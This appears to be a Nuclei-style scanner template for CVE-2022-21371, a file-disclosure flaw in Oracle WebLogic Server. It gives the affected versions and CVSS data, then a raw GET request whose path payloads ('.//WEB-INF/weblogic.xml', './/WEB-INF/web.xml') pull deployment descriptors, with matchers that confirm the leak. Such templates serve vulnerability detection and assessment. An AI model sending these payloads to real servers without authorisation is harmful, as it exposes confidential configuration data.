id: CVE-2022-21371

info:
  name: Oracle WebLogic Server LFI
  author: paradessia,narluin
  severity: high
  description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-21371
    - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2022-21371
  tags: cve,cve2022,lfi,weblogic,oracle

requests:
  - method: GET
    raw:
      - |+
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - .//WEB-INF/weblogic.xml
        - .//WEB-INF/web.xml

    unsafe: true
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<web-app") && contains(body, "</web-app>")'
          - 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
        condition: or

      - type: dsl
        dsl:
          - 'contains(all_headers, "text/xml")'
          - 'contains(all_headers, "application/xml")'
        condition: or

      - type: status
        status:
          - 200